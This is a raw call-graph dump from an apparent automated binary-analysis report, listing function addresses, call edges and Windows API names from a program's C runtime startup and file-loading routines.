101613->101750 101751 7ffb0c037270 19 API calls 101613->101751 101803 7ffb0c0290a0 101616->101803 101619 7ffb0c09cf30 101620 7ffb0c09cf66 101619->101620 101621 7ffb0c09cf5d 101619->101621 101620->101621 101642 7ffb0c09cfd0 101620->101642 101861 7ffb0c029340 9 API calls 101621->101861 101623 7ffb0c09cf95 101862 7ffb0c029340 9 API calls 101623->101862 101625 7ffb0c09d3dd 101629 7ffb0c09d43d 101625->101629 101869 7ffb0c055950 38 API calls 101625->101869 101626 7ffb0c09cfbf 101626->101573 101632 7ffb0c09d574 101629->101632 101870 7ffb0c0e3ba0 11 API calls 101629->101870 101632->101573 101634 7ffb0c09d56c new[] 101634->101632 101636 7ffb0c09d59d 00007FFB1C263010 101634->101636 101636->101632 101637 7ffb0c09d3f1 101868 7ffb0c0559e0 38 API calls 101637->101868 101641 7ffb0c09d3df 101867 7ffb0c026c40 9 API calls 101641->101867 101642->101625 101642->101637 101642->101641 101827 7ffb0c0a5220 101642->101827 101839 7ffb0c058f60 101642->101839 101863 7ffb0c026840 9 API calls new[] 101642->101863 101864 7ffb0c05a040 11 API calls 101642->101864 101865 7ffb0c0514a0 11 API calls 101642->101865 101866 7ffb0c0559e0 38 API calls 101642->101866 101644->101562 101645->101574 101646->101574 101647->101575 101648->101574 101649->101561 101650->101550 101651->101548 101653 7ffb0c152909 101652->101653 101654 7ffb0c152914 101653->101654 101655 7ffb0c152954 IsProcessorFeaturePresent 101653->101655 101654->101554 101656 7ffb0c15296c 101655->101656 101927 7ffb0c152b4c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101656->101927 101658 7ffb0c15297f 101658->101554 101659->101582 101660->101585 101662 7ffb0c0a4ce4 101661->101662 101663 7ffb0c0a4d5f 101662->101663 101680 7ffb0c0a4d7d 101662->101680 101715 7ffb0c02a500 9 API calls 101663->101715 101665 7ffb0c0a4f3b 101703 7ffb0c0dfc80 101665->101703 101666 7ffb0c0a4eaa 101670 7ffb0c0a4eb3 101666->101670 101671 7ffb0c0a4edb 101666->101671 101667 7ffb0c0a4e77 101667->101665 101667->101666 101669 7ffb0c152900 4 API calls 101672 7ffb0c0a41e2 101669->101672 101717 7ffb0c02a370 11 API calls 101670->101717 101677 7ffb0c0a4f14 101671->101677 101718 7ffb0c026840 9 API calls new[] 101671->101718 101672->101593 101672->101599 101672->101600 101674 7ffb0c0a4d70 101674->101669 101676 7ffb0c0a4eec 101676->101677 101678 7ffb0c0a4ef4 00007FFB1C263010 101676->101678 101682 7ffb0c0a4fba 101677->101682 101719 7ffb0c026840 9 API calls new[] 101677->101719 101679 7ffb0c0dfc80 9 API calls 101678->101679 101679->101677 101680->101667 101683 7ffb0c0a4e52 101680->101683 101681 7ffb0c0a5125 101681->101674 101724 7ffb0c02a370 11 API calls 101681->101724 101682->101674 101690 7ffb0c0a4fce 101682->101690 101691 7ffb0c043790 21 API calls 101682->101691 101720 7ffb0c026c40 9 API calls 101682->101720 101721 7ffb0c081280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101682->101721 101722 7ffb0c044b80 29 API calls 101682->101722 101716 7ffb0c02a370 11 API calls 101683->101716 101686 7ffb0c0a4f9d 101686->101682 101689 7ffb0c0a4fa5 00007FFB1C263010 101686->101689 101689->101682 101690->101681 101723 7ffb0c0559e0 38 API calls 101690->101723 101691->101682 101695->101599 101696->101604 101697->101599 101698->101594 101699->101602 101700->101606 101701->101608 101702->101595 101713 7ffb0c0dfcd1 101703->101713 101705 7ffb0c0e00f0 101736 7ffb0c029340 9 API calls 101705->101736 101707 7ffb0c0e0099 101735 7ffb0c02a500 9 API calls 101707->101735 101709 7ffb0c029170 9 API calls 101709->101705 101710 7ffb0c0dffde 101710->101705 101710->101709 101714 7ffb0c0e010d 101710->101714 101711 7ffb0c152900 4 API calls 101712 7ffb0c0e0250 101711->101712 101712->101677 101713->101707 101713->101710 101725 7ffb0c0df0f0 101713->101725 101714->101711 101715->101674 101716->101674 101717->101674 101718->101676 101719->101686 101720->101682 101721->101682 101722->101682 101723->101681 101724->101674 101726 7ffb0c0df133 101725->101726 101727 7ffb0c0df24d 101726->101727 101728 7ffb0c0df20b 101726->101728 101729 7ffb0c0df293 101727->101729 101730 7ffb0c0df280 101727->101730 101734 7ffb0c0df229 101727->101734 101728->101734 101737 7ffb0c0dc2c0 9 API calls 101728->101737 101739 7ffb0c02a500 9 API calls 101729->101739 101738 7ffb0c02a500 9 API calls 101730->101738 101734->101713 101735->101710 101736->101714 101737->101734 101738->101734 101739->101734 101752 7ffb0c039d00 101740->101752 101743 7ffb0c0433a2 101745 7ffb0c04355d 101743->101745 101747 7ffb0c0434a4 101743->101747 101775 7ffb0c0e5aa0 9 API calls 101743->101775 101745->101747 101776 7ffb0c037270 19 API calls 101745->101776 101747->101613 101749->101613 101750->101613 101751->101613 101756 7ffb0c039f1f 101752->101756 101761 7ffb0c039d30 101752->101761 101754 7ffb0c152900 4 API calls 101755 7ffb0c03a0b9 101754->101755 101755->101747 101764 7ffb0c03a0d0 101755->101764 101758 7ffb0c039dc1 101756->101758 101790 7ffb0c03ec50 12 API calls 101756->101790 101757 7ffb0c039ec5 101757->101756 101757->101758 101777 7ffb0c02d9e0 101757->101777 101758->101754 101759 7ffb0c039e82 101759->101757 101759->101758 101789 7ffb0c037c90 11 API calls 101759->101789 101761->101756 101761->101757 101761->101758 101761->101759 101788 7ffb0c0e5ae0 9 API calls 101761->101788 101765 7ffb0c03a0f2 101764->101765 101767 7ffb0c03a125 101764->101767 101799 7ffb0c029340 9 API calls 101765->101799 101768 7ffb0c03a248 101767->101768 101771 7ffb0c03a2a0 101767->101771 101773 7ffb0c03a15d 101767->101773 101774 7ffb0c03a11e 101767->101774 101800 7ffb0c029340 9 API calls 101768->101800 101771->101773 101793 7ffb0c038050 101771->101793 101773->101774 101801 7ffb0c037270 19 API calls 101773->101801 101774->101743 101775->101745 101776->101747 101778 7ffb0c02da0d 101777->101778 101785 7ffb0c02da5a 101777->101785 101779 7ffb0c02da43 00007FFB1C263010 101778->101779 101780 7ffb0c02da23 00007FFB1C263010 101778->101780 101779->101785 101783 7ffb0c02da28 101780->101783 101781 7ffb0c02da83 ReadFile 101782 7ffb0c02db19 101781->101782 101781->101785 101782->101783 101792 7ffb0c029340 9 API calls 101782->101792 101783->101756 101785->101781 101785->101782 101786 7ffb0c02daf3 101785->101786 101791 7ffb0c02d810 13 API calls 101786->101791 101788->101759 101789->101757 101790->101758 101791->101783 101792->101783 101794 7ffb0c03807f 101793->101794 101795 7ffb0c03808c 101793->101795 101802 7ffb0c03efb0 10 API calls 101794->101802 101797 7ffb0c03809c 101795->101797 101798 7ffb0c02d9e0 16 API calls 101795->101798 101797->101773 101798->101797 101799->101774 101800->101773 101801->101774 101802->101795 101812 7ffb0c026ec0 101803->101812 101805 7ffb0c02913f 101808 7ffb0c152900 4 API calls 101805->101808 101810 7ffb0c029152 101808->101810 101810->101619 101811 7ffb0c029126 101811->101805 101824 7ffb0c026c40 9 API calls 101811->101824 101816 7ffb0c026f09 101812->101816 101813 7ffb0c028606 101814 7ffb0c152900 4 API calls 101813->101814 101815 7ffb0c028643 101814->101815 101815->101811 101823 7ffb0c028cc0 9 API calls new[] 101815->101823 101816->101813 101817 7ffb0c026f93 101816->101817 101818 7ffb0c026f83 101816->101818 101822 7ffb0c026f91 101816->101822 101821 7ffb0c026f97 00007FFB1C263010 101817->101821 101817->101822 101825 7ffb0c028bf0 9 API calls 101818->101825 101821->101822 101822->101813 101826 7ffb0c028bf0 9 API calls 101822->101826 101823->101811 101824->101805 101825->101822 101826->101813 101828 7ffb0c0a52ae 101827->101828 101829 7ffb0c0a5258 101827->101829 101828->101829 101830 7ffb0c0a52d0 101828->101830 101871 7ffb0c029340 9 API calls 101829->101871 101832 7ffb0c0a5270 101830->101832 101835 7ffb0c0a52d5 101830->101835 101872 7ffb0c029340 9 API calls 101832->101872 101834 7ffb0c0a529a 101834->101642 101836 7ffb0c0a4c70 40 API calls 101835->101836 101837 7ffb0c0a53cd 101835->101837 101873 7ffb0c08b040 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101835->101873 101836->101835 101837->101642 101840 7ffb0c058f87 101839->101840 101841 7ffb0c058f74 101839->101841 101842 7ffb0c058f9d 101840->101842 101890 7ffb0c029340 9 API calls 101840->101890 101889 7ffb0c029340 9 API calls 101841->101889 101845 7ffb0c058f85 101842->101845 101847 7ffb0c058fe1 101842->101847 101891 7ffb0c029340 9 API calls 101845->101891 101874 7ffb0c058cd0 101847->101874 101848 7ffb0c058fd4 101848->101642 101852 7ffb0c059066 101857 7ffb0c059072 101852->101857 101894 7ffb0c0514a0 11 API calls 101852->101894 101853 7ffb0c059005 101853->101852 101855 7ffb0c058cd0 38 API calls 101853->101855 101856 7ffb0c059061 101853->101856 101892 7ffb0c0a5440 40 API calls 101853->101892 101893 7ffb0c057e50 38 API calls 101853->101893 101855->101853 101856->101642 101857->101856 101895 7ffb0c026840 9 API calls new[] 101857->101895 101859 7ffb0c0590eb 101859->101856 101860 7ffb0c0590f3 00007FFB1C263010 101859->101860 101860->101856 101861->101623 101862->101626 101863->101642 101864->101642 101865->101642 101866->101642 101867->101625 101868->101625 101869->101629 101870->101634 101871->101832 101872->101834 101873->101835 101875 7ffb0c058ced 101874->101875 101885 7ffb0c058d45 101874->101885 101876 7ffb0c058d0c 101875->101876 101875->101885 101916 7ffb0c057e50 38 API calls 101875->101916 101880 7ffb0c058d15 101876->101880 101876->101885 101877 7ffb0c058dbe 101918 7ffb0c053e30 11 API calls 101877->101918 101878 7ffb0c058dc5 101896 7ffb0c05bd30 101878->101896 101888 7ffb0c058ddd 101880->101888 101917 7ffb0c055850 11 API calls 101880->101917 101884 7ffb0c058d36 101884->101853 101885->101877 101885->101878 101886 7ffb0c058dc3 101886->101888 101919 7ffb0c055850 11 API calls 101886->101919 101888->101853 101889->101845 101890->101842 101891->101848 101892->101853 101893->101853 101894->101857 101895->101859 101897 7ffb0c05bdc6 101896->101897 101899 7ffb0c05be6d 101897->101899 101920 7ffb0c026c40 9 API calls 101897->101920 101900 7ffb0c062478 101921 7ffb0c051e20 9 API calls 101900->101921 101902 7ffb0c06251b 101923 7ffb0c029340 9 API calls 101902->101923 101903 7ffb0c062487 101903->101886 101903->101902 101922 7ffb0c051e20 9 API calls 101903->101922 101906 7ffb0c062566 101907 7ffb0c062577 101906->101907 101924 7ffb0c0554a0 36 API calls 101906->101924 101909 7ffb0c062588 101907->101909 101925 7ffb0c026c40 9 API calls 101907->101925 101912 7ffb0c062034 101909->101912 101926 7ffb0c081280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101909->101926 101913 7ffb0c152900 4 API calls 101912->101913 101915 7ffb0c062067 101912->101915 101914 7ffb0c062643 101913->101914 101914->101886 101915->101886 101916->101875 101917->101884 101918->101886 101919->101888 101920->101900 101921->101903 101922->101902 101923->101906 101924->101907 101925->101909 101926->101912 101927->101658 101928 7ff7c266ccac 101949 7ff7c266ce7c 101928->101949 101931 7ff7c266cdf8 102098 7ff7c266d19c 7 API calls 2 library calls 101931->102098 101932 7ff7c266ccc8 __scrt_acquire_startup_lock 101934 7ff7c266ce02 101932->101934 101941 7ff7c266cce6 __scrt_release_startup_lock 101932->101941 102099 7ff7c266d19c 7 API calls 2 library calls 101934->102099 101936 7ff7c266cd0b 101937 7ff7c266ce0d __FrameHandler3::FrameUnwindToEmptyState 101938 7ff7c266cd91 101955 7ff7c266d2e4 101938->101955 101940 7ff7c266cd96 101958 7ff7c2661000 101940->101958 101941->101936 101941->101938 102095 7ff7c2679b9c 45 API calls 101941->102095 101946 7ff7c266cdb9 101946->101937 102097 7ff7c266d000 7 API calls 101946->102097 101948 7ff7c266cdd0 101948->101936 101950 7ff7c266ce84 101949->101950 101951 7ff7c266ce90 __scrt_dllmain_crt_thread_attach 101950->101951 101952 7ff7c266ccc0 101951->101952 101953 7ff7c266ce9d 101951->101953 101952->101931 101952->101932 101953->101952 102100 7ff7c266d8f8 7 API calls 2 library calls 101953->102100 102101 7ff7c268a540 101955->102101 101959 7ff7c2661009 101958->101959 102103 7ff7c26754f4 101959->102103 101961 7ff7c26637fb 102110 7ff7c26636b0 101961->102110 101967 7ff7c266383c 102209 7ff7c2661c80 101967->102209 101968 7ff7c266391b 102214 7ff7c26645b0 101968->102214 101972 7ff7c266385b 102182 7ff7c2668a20 101972->102182 101975 7ff7c266396a 102237 7ff7c2662710 54 API calls _log10_special 101975->102237 101978 7ff7c266388e 101985 7ff7c26638bb __std_exception_copy 101978->101985 102213 7ff7c2668b90 40 API calls __std_exception_copy 101978->102213 101979 7ff7c266395d 101980 7ff7c2663984 101979->101980 101981 7ff7c2663962 101979->101981 101983 7ff7c2661c80 49 API calls 101980->101983 102233 7ff7c26700bc 101981->102233 101986 7ff7c26639a3 101983->101986 101987 7ff7c2668a20 14 API calls 101985->101987 101994 7ff7c26638de __std_exception_copy 101985->101994 101991 7ff7c2661950 115 API calls 101986->101991 101987->101994 101989 7ff7c2663a0b 102240 7ff7c2668b90 40 API calls __std_exception_copy 101989->102240 101993 7ff7c26639ce 101991->101993 101992 7ff7c2663a17 102241 7ff7c2668b90 40 API calls __std_exception_copy 101992->102241 101993->101972 101996 7ff7c26639de 101993->101996 102000 7ff7c266390e __std_exception_copy 101994->102000 102239 7ff7c2668b30 40 API calls __std_exception_copy 101994->102239 102238 7ff7c2662710 54 API calls _log10_special 101996->102238 101997 7ff7c2663a23 102242 7ff7c2668b90 40 API calls __std_exception_copy 101997->102242 102001 7ff7c2668a20 14 API calls 102000->102001 102002 7ff7c2663a3b 102001->102002 102003 7ff7c2663b2f 102002->102003 102004 7ff7c2663a60 __std_exception_copy 102002->102004 102244 7ff7c2662710 54 API calls _log10_special 102003->102244 102017 7ff7c2663aab 102004->102017 102243 7ff7c2668b30 40 API calls __std_exception_copy 102004->102243 102007 7ff7c2668a20 14 API calls 102008 7ff7c2663bf4 __std_exception_copy 102007->102008 102009 7ff7c2663c46 102008->102009 102010 7ff7c2663d41 102008->102010 102011 7ff7c2663cd4 102009->102011 102012 7ff7c2663c50 102009->102012 102258 7ff7c26644d0 49 API calls 102010->102258 102015 7ff7c2668a20 14 API calls 102011->102015 102245 7ff7c26690e0 59 API calls _log10_special 102012->102245 102019 7ff7c2663ce0 102015->102019 102016 7ff7c2663d4f 102020 7ff7c2663d65 102016->102020 102021 7ff7c2663d71 102016->102021 102017->102007 102018 7ff7c2663c55 102022 7ff7c2663cb3 102018->102022 102023 7ff7c2663c61 102018->102023 102019->102023 102027 7ff7c2663ced 102019->102027 102259 7ff7c2664620 102020->102259 102025 7ff7c2661c80 49 API calls 102021->102025 102256 7ff7c2668850 86 API calls 2 library calls 102022->102256 102246 7ff7c2662710 54 API calls _log10_special 102023->102246 102037 7ff7c2663d2b __std_exception_copy 102025->102037 102030 7ff7c2661c80 49 API calls 102027->102030 102028 7ff7c2663cbb 102033 7ff7c2663cc8 102028->102033 102034 7ff7c2663cbf 102028->102034 102035 7ff7c2663d0b 102030->102035 102031 7ff7c2663dc4 102195 7ff7c2669400 102031->102195 102033->102037 102034->102023 102035->102037 102038 7ff7c2663d12 102035->102038 102036 7ff7c2663dd7 SetDllDirectoryW 102042 7ff7c2663e0a 102036->102042 102087 7ff7c2663e5a 102036->102087 102037->102031 102039 7ff7c2663da7 SetDllDirectoryW LoadLibraryExW 102037->102039 102257 7ff7c2662710 54 API calls _log10_special 102038->102257 102039->102031 102045 7ff7c2668a20 14 API calls 102042->102045 102043 7ff7c2663808 __std_exception_copy 102247 7ff7c266c5c0 102043->102247 102044 7ff7c2663ffc 102047 7ff7c2664029 102044->102047 102048 7ff7c2664006 PostMessageW GetMessageW 102044->102048 102053 7ff7c2663e16 __std_exception_copy 102045->102053 102046 7ff7c2663f1b 102270 7ff7c26633c0 121 API calls 2 library calls 102046->102270 102200 7ff7c2663360 102047->102200 102048->102047 102050 7ff7c2663f23 102050->102043 102051 7ff7c2663f2b 102050->102051 102271 7ff7c26690c0 LocalFree 102051->102271 102056 7ff7c2663ef2 102053->102056 102057 7ff7c2663e4e 102053->102057 102269 7ff7c2668b30 40 API calls __std_exception_copy 102056->102269 102057->102087 102262 7ff7c2666db0 54 API calls _get_daylight 102057->102262 102063 7ff7c2664043 102273 7ff7c2666fb0 FreeLibrary 102063->102273 102068 7ff7c266404f 102069 7ff7c2663e6c 102263 7ff7c2667330 117 API calls 2 library calls 102069->102263 102073 7ff7c2663e81 102076 7ff7c2663ea2 102073->102076 102088 7ff7c2663e85 102073->102088 102264 7ff7c2666df0 120 API calls _log10_special 102073->102264 102076->102088 102265 7ff7c26671a0 125 API calls 102076->102265 102080 7ff7c2663eb7 102080->102088 102266 7ff7c26674e0 55 API calls 102080->102266 102082 7ff7c2663ee0 102268 7ff7c2666fb0 FreeLibrary 102082->102268 102087->102044 102087->102046 102088->102087 102267 7ff7c2662a50 54 API calls _log10_special 102088->102267 102095->101938 102096 7ff7c266d328 GetModuleHandleW 102096->101946 102097->101948 102098->101934 102099->101937 102100->101952 102102 7ff7c266d2fb GetStartupInfoW 102101->102102 102102->101940 102106 7ff7c267f4f0 102103->102106 102104 7ff7c267f543 102274 7ff7c267a884 37 API calls 2 library calls 102104->102274 102106->102104 102107 7ff7c267f596 102106->102107 102275 7ff7c267f3c8 71 API calls _fread_nolock 102107->102275 102109 7ff7c267f56c 102109->101961 102276 7ff7c266c8c0 102110->102276 102113 7ff7c26636eb GetLastError 102283 7ff7c2662c50 51 API calls _log10_special 102113->102283 102114 7ff7c2663710 102278 7ff7c26692f0 FindFirstFileExW 102114->102278 102117 7ff7c2663706 102122 7ff7c266c5c0 _log10_special 8 API calls 102117->102122 102119 7ff7c266377d 102286 7ff7c26694b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 102119->102286 102120 7ff7c2663723 102284 7ff7c2669370 CreateFileW GetFinalPathNameByHandleW CloseHandle 102120->102284 102125 7ff7c26637b5 102122->102125 102124 7ff7c266378b 102124->102117 102287 7ff7c2662810 49 API calls _log10_special 102124->102287 102125->102043 102132 7ff7c2661950 102125->102132 102126 7ff7c2663730 102127 7ff7c266374c __vcrt_FlsAlloc 102126->102127 102128 7ff7c2663734 102126->102128 102127->102119 102285 7ff7c2662810 49 API calls _log10_special 102128->102285 102131 7ff7c2663745 102131->102117 102133 7ff7c26645b0 108 API calls 102132->102133 102134 7ff7c2661985 102133->102134 102136 7ff7c2667f80 83 API calls 102134->102136 102141 7ff7c2661c43 102134->102141 102135 7ff7c266c5c0 _log10_special 8 API calls 102137 7ff7c2661c5e 102135->102137 102138 7ff7c26619cb 102136->102138 102137->101967 102137->101968 102181 7ff7c2661a03 102138->102181 102288 7ff7c2670744 102138->102288 102139 7ff7c26700bc 74 API calls 102139->102141 102141->102135 102142 7ff7c26619e5 102143 7ff7c2661a08 102142->102143 102144 7ff7c26619e9 102142->102144 102292 7ff7c267040c 102143->102292 102295 7ff7c2674f78 11 API calls _get_daylight 102144->102295 102147 7ff7c26619ee 102296 7ff7c2662910 54 API calls _log10_special 102147->102296 102150 7ff7c2661a26 102297 7ff7c2674f78 11 API calls _get_daylight 102150->102297 102151 7ff7c2661a45 102154 7ff7c2661a5c 102151->102154 102155 7ff7c2661a7b 102151->102155 102153 7ff7c2661a2b 102298 7ff7c2662910 54 API calls _log10_special 102153->102298 102299 7ff7c2674f78 11 API calls _get_daylight 102154->102299 102158 7ff7c2661c80 49 API calls 102155->102158 102160 7ff7c2661a92 102158->102160 102159 7ff7c2661a61 102300 7ff7c2662910 54 API calls _log10_special 102159->102300 102162 7ff7c2661c80 49 API calls 102160->102162 102163 7ff7c2661add 102162->102163 102164 7ff7c2670744 73 API calls 102163->102164 102165 7ff7c2661b01 102164->102165 102166 7ff7c2661b16 102165->102166 102167 7ff7c2661b35 102165->102167 102301 7ff7c2674f78 11 API calls _get_daylight 102166->102301 102168 7ff7c267040c _fread_nolock 53 API calls 102167->102168 102171 7ff7c2661b4a 102168->102171 102170 7ff7c2661b1b 102302 7ff7c2662910 54 API calls _log10_special 102170->102302 102173 7ff7c2661b50 102171->102173 102174 7ff7c2661b6f 102171->102174 102303 7ff7c2674f78 11 API calls _get_daylight 102173->102303 102305 7ff7c2670180 37 API calls 2 library calls 102174->102305 102177 7ff7c2661b55 102304 7ff7c2662910 54 API calls _log10_special 102177->102304 102178 7ff7c2661b89 102178->102181 102306 7ff7c2662710 54 API calls _log10_special 102178->102306 102181->102139 102183 7ff7c2668a2a 102182->102183 102184 7ff7c2669400 2 API calls 102183->102184 102185 7ff7c2668a49 GetEnvironmentVariableW 102184->102185 102186 7ff7c2668a66 ExpandEnvironmentStringsW 102185->102186 102187 7ff7c2668ab2 102185->102187 102186->102187 102188 7ff7c2668a88 102186->102188 102189 7ff7c266c5c0 _log10_special 8 API calls 102187->102189 102336 7ff7c26694b0 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 102188->102336 102191 7ff7c2668ac4 102189->102191 102191->101978 102192 7ff7c2668a9a 102193 7ff7c266c5c0 _log10_special 8 API calls 102192->102193 102194 7ff7c2668aaa 102193->102194 102194->101978 102196 7ff7c2669422 MultiByteToWideChar 102195->102196 102197 7ff7c2669446 102195->102197 102196->102197 102199 7ff7c266945c __std_exception_copy 102196->102199 102198 7ff7c2669463 MultiByteToWideChar 102197->102198 102197->102199 102198->102199 102199->102036 102337 7ff7c2666350 102200->102337 102202 7ff7c2663399 102272 7ff7c2663670 FreeLibrary 102202->102272 102205 7ff7c2663381 102205->102202 102405 7ff7c2666040 102205->102405 102207 7ff7c266338d 102207->102202 102414 7ff7c26661d0 54 API calls 102207->102414 102210 7ff7c2661ca5 102209->102210 102553 7ff7c26749f4 102210->102553 102213->101985 102215 7ff7c26645bc 102214->102215 102216 7ff7c2669400 2 API calls 102215->102216 102217 7ff7c26645e4 102216->102217 102218 7ff7c2669400 2 API calls 102217->102218 102219 7ff7c26645f7 102218->102219 102576 7ff7c2676004 102219->102576 102222 7ff7c266c5c0 _log10_special 8 API calls 102223 7ff7c266392b 102222->102223 102223->101975 102224 7ff7c2667f80 102223->102224 102225 7ff7c2667fa4 102224->102225 102226 7ff7c2670744 73 API calls 102225->102226 102231 7ff7c266807b __std_exception_copy 102225->102231 102227 7ff7c2667fc0 102226->102227 102227->102231 102744 7ff7c2677938 102227->102744 102229 7ff7c2670744 73 API calls 102232 7ff7c2667fd5 102229->102232 102230 7ff7c267040c _fread_nolock 53 API calls 102230->102232 102231->101979 102232->102229 102232->102230 102232->102231 102234 7ff7c26700ec 102233->102234 102760 7ff7c266fe98 102234->102760 102236 7ff7c2670105 102236->101975 102237->102043 102238->102043 102239->101989 102240->101992 102241->101997 102242->102000 102243->102017 102244->102043 102245->102018 102246->102043 102248 7ff7c266c5c9 102247->102248 102249 7ff7c2663ca7 102248->102249 102250 7ff7c266c950 IsProcessorFeaturePresent 102248->102250 102249->102096 102251 7ff7c266c968 102250->102251 102772 7ff7c266cb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 102251->102772 102253 7ff7c266c97b 102773 7ff7c266c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 102253->102773 102256->102028 102257->102043 102258->102016 102260 7ff7c2661c80 49 API calls 102259->102260 102261 7ff7c2664650 102260->102261 102261->102037 102261->102261 102262->102069 102263->102073 102264->102076 102265->102080 102266->102088 102267->102082 102268->102087 102269->102087 102270->102050 102272->102063 102273->102068 102274->102109 102275->102109 102277 7ff7c26636bc GetModuleFileNameW 102276->102277 102277->102113 102277->102114 102279 7ff7c266932f FindClose 102278->102279 102280 7ff7c2669342 102278->102280 102279->102280 102281 7ff7c266c5c0 _log10_special 8 API calls 102280->102281 102282 7ff7c266371a 102281->102282 102282->102119 102282->102120 102283->102117 102284->102126 102285->102131 102286->102124 102287->102117 102289 7ff7c2670774 102288->102289 102307 7ff7c26704d4 102289->102307 102291 7ff7c267078d 102291->102142 102320 7ff7c267042c 102292->102320 102295->102147 102296->102181 102297->102153 102298->102181 102299->102159 102300->102181 102301->102170 102302->102181 102303->102177 102304->102181 102305->102178 102306->102181 102308 7ff7c267053e 102307->102308 102309 7ff7c26704fe 102307->102309 102308->102309 102310 7ff7c267054a 102308->102310 102319 7ff7c267a884 37 API calls 2 library calls 102309->102319 102318 7ff7c26754dc EnterCriticalSection 102310->102318 102313 7ff7c2670525 102313->102291 102314 7ff7c267054f 102315 7ff7c2670658 71 API calls 102314->102315 102316 7ff7c2670561 102315->102316 102317 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102316->102317 102317->102313 102319->102313 102321 7ff7c2661a20 102320->102321 102322 7ff7c2670456 102320->102322 102321->102150 102321->102151 102322->102321 102323 7ff7c2670465 __scrt_get_show_window_mode 102322->102323 102324 7ff7c26704a2 102322->102324 102334 7ff7c2674f78 11 API calls _get_daylight 102323->102334 102333 7ff7c26754dc EnterCriticalSection 102324->102333 102326 7ff7c26704aa 102328 7ff7c26701ac _fread_nolock 51 API calls 102326->102328 102330 7ff7c26704c1 102328->102330 102329 7ff7c267047a 102335 7ff7c267a950 37 API calls _invalid_parameter_noinfo 102329->102335 102332 7ff7c26754e8 _fread_nolock LeaveCriticalSection 102330->102332 102332->102321 102334->102329 102335->102321 102336->102192 102338 7ff7c2666365 102337->102338 102339 7ff7c2661c80 49 API calls 102338->102339 102340 7ff7c26663a1 102339->102340 102341 7ff7c26663cd 102340->102341 102342 7ff7c26663aa 102340->102342 102344 7ff7c2664620 49 API calls 102341->102344 102425 7ff7c2662710 54 API calls _log10_special 102342->102425 102346 7ff7c26663e5 102344->102346 102345 7ff7c26663c3 102350 7ff7c266c5c0 _log10_special 8 API calls 102345->102350 102347 7ff7c2666403 102346->102347 102426 7ff7c2662710 54 API calls _log10_special 102346->102426 102415 7ff7c2664550 102347->102415 102352 7ff7c266336e 102350->102352 102352->102202 102368 7ff7c26664f0 102352->102368 102353 7ff7c266641b 102355 7ff7c2664620 49 API calls 102353->102355 102354 7ff7c2669070 3 API calls 102354->102353 102356 7ff7c2666434 102355->102356 102357 7ff7c2666459 102356->102357 102358 7ff7c2666439 102356->102358 102421 7ff7c2669070 102357->102421 102427 7ff7c2662710 54 API calls _log10_special 102358->102427 102361 7ff7c2666466 102362 7ff7c2666472 102361->102362 102363 7ff7c26664b1 102361->102363 102364 7ff7c2669400 2 API calls 102362->102364 102429 7ff7c2665820 137 API calls 102363->102429 102366 7ff7c266648a GetLastError 102364->102366 102428 7ff7c2662c50 51 API calls _log10_special 102366->102428 102430 7ff7c26653f0 102368->102430 102370 7ff7c2666516 102371 7ff7c266651e 102370->102371 102372 7ff7c266652f 102370->102372 102455 7ff7c2662710 54 API calls _log10_special 102371->102455 102437 7ff7c2664c80 102372->102437 102376 7ff7c266654c 102379 7ff7c266655c 102376->102379 102382 7ff7c266656d 102376->102382 102377 7ff7c266653b 102456 7ff7c2662710 54 API calls _log10_special 102377->102456 102457 7ff7c2662710 54 API calls _log10_special 102379->102457 102380 7ff7c266652a 102380->102205 102383 7ff7c266658c 102382->102383 102384 7ff7c266659d 102382->102384 102458 7ff7c2662710 54 API calls _log10_special 102383->102458 102386 7ff7c26665ac 102384->102386 102387 7ff7c26665bd 102384->102387 102459 7ff7c2662710 54 API calls _log10_special 102386->102459 102441 7ff7c2664d40 102387->102441 102391 7ff7c26665cc 102460 7ff7c2662710 54 API calls _log10_special 102391->102460 102393 7ff7c26665dd 102394 7ff7c26665ec 102393->102394 102395 7ff7c26665fd 102393->102395 102461 7ff7c2662710 54 API calls _log10_special 102394->102461 102397 7ff7c266660f 102395->102397 102399 7ff7c2666620 102395->102399 102462 7ff7c2662710 54 API calls _log10_special 102397->102462 102402 7ff7c266664a 102399->102402 102463 7ff7c2677320 73 API calls 102399->102463 102401 7ff7c2666638 102464 7ff7c2677320 73 API calls 102401->102464 102402->102380 102465 7ff7c2662710 54 API calls _log10_special 102402->102465 102406 7ff7c2666060 102405->102406 102407 7ff7c2666089 102406->102407 102413 7ff7c26660a0 __std_exception_copy 102406->102413 102497 7ff7c2662710 54 API calls _log10_special 102407->102497 102409 7ff7c2666095 102409->102207 102410 7ff7c26661ab 102410->102207 102412 7ff7c2662710 54 API calls 102412->102413 102413->102410 102413->102412 102467 7ff7c2661470 102413->102467 102414->102202 102416 7ff7c266455a 102415->102416 102417 7ff7c2669400 2 API calls 102416->102417 102418 7ff7c266457f 102417->102418 102419 7ff7c266c5c0 _log10_special 8 API calls 102418->102419 102420 7ff7c26645a7 102419->102420 102420->102353 102420->102354 102422 7ff7c2669400 2 API calls 102421->102422 102423 7ff7c2669084 LoadLibraryExW 102422->102423 102424 7ff7c26690a3 __std_exception_copy 102423->102424 102424->102361 102425->102345 102426->102347 102427->102345 102428->102345 102429->102345 102432 7ff7c266541c 102430->102432 102431 7ff7c2665424 102431->102370 102432->102431 102435 7ff7c26655c4 102432->102435 102466 7ff7c2676b14 48 API calls 102432->102466 102433 7ff7c2665787 __std_exception_copy 102433->102370 102434 7ff7c26647c0 47 API calls 102434->102435 102435->102433 102435->102434 102438 7ff7c2664cb0 102437->102438 102439 7ff7c266c5c0 _log10_special 8 API calls 102438->102439 102440 7ff7c2664d1a 102439->102440 102440->102376 102440->102377 102442 7ff7c2664d55 102441->102442 102443 7ff7c2661c80 49 API calls 102442->102443 102444 7ff7c2664da1 102443->102444 102445 7ff7c2664e23 __std_exception_copy 102444->102445 102446 7ff7c2661c80 49 API calls 102444->102446 102447 7ff7c266c5c0 _log10_special 8 API calls 102445->102447 102448 7ff7c2664de0 102446->102448 